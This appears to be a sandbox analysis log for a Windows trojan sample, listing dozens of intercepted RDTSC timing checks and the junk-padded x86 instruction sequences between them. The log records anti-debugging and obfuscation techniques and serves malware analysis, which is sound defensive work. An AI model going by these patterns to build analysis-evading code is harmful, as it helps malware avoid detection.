Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5639A second address: D563C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jg 00007F3620DC90F6h 0x0000000d pop esi 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 jo 00007F3620DC90F8h 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3620DC90FEh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D563C4 second address: D563E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5B6BC second address: D5B6D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9102h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5BF2D second address: D5BF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5BF32 second address: D5BF37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C1E3 second address: D5C1FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C1FE second address: D5C203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C36D second address: D5C379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C379 second address: D5C37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C4ED second address: D5C4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C4F3 second address: D5C4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C4F8 second address: D5C504 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F362081F59Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C669 second address: D5C66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C66F second address: D5C6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F5A1h 0x00000009 popad 0x0000000a jmp 00007F362081F5A4h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F362081F59Eh 0x00000017 push edx 0x00000018 jnc 00007F362081F596h 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5C828 second address: D5C846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3620DC90FCh 0x0000000d jmp 00007F3620DC90FAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D63FFC second address: D64008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F362081F596h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D648B2 second address: D648D9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3620DC90F6h 0x00000008 jmp 00007F3620DC9105h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F3620DC90F8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D648D9 second address: D648DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D64A2C second address: D64A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D64B73 second address: D64B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D64EC5 second address: D64EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F3620DC90F6h 0x0000000a jmp 00007F3620DC90FFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D64EDE second address: D64EE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6E0F4 second address: D6E0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CD6E second address: D6CD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CD72 second address: D6CD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CEC5 second address: D6CED1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CED1 second address: D6CED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CED5 second address: D6CEEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007F362081F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jnp 00007F362081F5A2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6CEEA second address: D6CEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6D1D5 second address: D6D1DB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6D1DB second address: D6D1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F3620DC90FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6D1E9 second address: D6D1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 jnc 00007F362081F596h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6D1F7 second address: D6D223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3620DC90F6h 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007F3620DC9107h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6D969 second address: D6D975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F362081F596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6DAD7 second address: D6DAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6DAEF second address: D6DAF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6DAF8 second address: D6DB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3620DC90FBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D0FAD2 second address: D0FAD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6DF52 second address: D6DF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D6C876 second address: D6C87B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D728EA second address: D72900 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3620DC90FAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D29028 second address: D2902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2902E second address: D2907D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 nop 0x00000007 lea eax, dword ptr [ebp+1248DDAAh] 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F3620DC90F8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 nop 0x00000028 push ecx 0x00000029 push ebx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c pop ebx 0x0000002d pop ecx 0x0000002e push eax 0x0000002f pushad 0x00000030 jns 00007F3620DC90F8h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F3620DC9103h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2907D second address: D0EEC2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F362081F598h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jns 00007F362081F59Ch 0x0000002c jng 00007F362081F59Ch 0x00000032 mov ecx, dword ptr [ebp+122D2936h] 0x00000038 call dword ptr [ebp+122D39C6h] 0x0000003e jl 00007F362081F5C5h 0x00000044 push edx 0x00000045 jmp 00007F362081F5A5h 0x0000004a pushad 0x0000004b popad 0x0000004c pop edx 0x0000004d jmp 00007F362081F5A6h 0x00000052 push ebx 0x00000053 push ebx 0x00000054 pushad 0x00000055 popad 0x00000056 pop ebx 0x00000057 pushad 0x00000058 jg 00007F362081F596h 0x0000005e jmp 00007F362081F5A7h 0x00000063 push ecx 0x00000064 pop ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D295D0 second address: D295D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D295D4 second address: D295F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F362081F59Bh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F362081F596h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D295F6 second address: D29625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jne 00007F3620DC90F6h 0x00000015 popad 0x00000016 push edi 0x00000017 jnp 00007F3620DC90F6h 0x0000001d pop edi 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 ja 00007F3620DC90FCh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D29625 second address: D29655 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F362081F598h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F362081F5AEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D297B5 second address: D297BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D29D5D second address: D29D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D29D61 second address: D29D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F3620DC90FBh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D29E72 second address: D29E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A097 second address: D2A0AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0AF second address: D2A0CB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F362081F59Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F362081F596h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0CB second address: D2A0CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0CF second address: D2A0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0D5 second address: D2A0DF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3620DC90FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0DF second address: D2A0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0EF second address: D2A0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A0F3 second address: D2A0FD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A1AA second address: D2A1F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 js 00007F3620DC90F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 cld 0x00000012 lea eax, dword ptr [ebp+1248DDEEh] 0x00000018 jmp 00007F3620DC9101h 0x0000001d mov ecx, dword ptr [ebp+122D1E43h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jnc 00007F3620DC90F6h 0x0000002d jmp 00007F3620DC9102h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A1F6 second address: D2A23C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, dword ptr [ebp+122D2B3Dh] 0x00000012 jmp 00007F362081F5A6h 0x00000017 lea eax, dword ptr [ebp+1248DDAAh] 0x0000001d mov ecx, dword ptr [ebp+122D2B8Dh] 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A23C second address: D2A253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A253 second address: D0FAD2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F362081F59Ch 0x00000008 js 00007F362081F596h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 movsx ecx, cx 0x00000016 or dx, 5C3Dh 0x0000001b call dword ptr [ebp+122D1E1Ah] 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F362081F59Bh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72BE1 second address: D72BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72BE5 second address: D72C0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F362081F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F362081F5A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72C0B second address: D72C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72C11 second address: D72C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72C1D second address: D72C23 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72C23 second address: D72C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72C2A second address: D72C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72EE8 second address: D72EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72EEC second address: D72EF6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72EF6 second address: D72F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F362081F596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D72F00 second address: D72F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D7340C second address: D7341A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007F362081F596h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D7341A second address: D7341E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D74FC3 second address: D74FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D78DA0 second address: D78DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
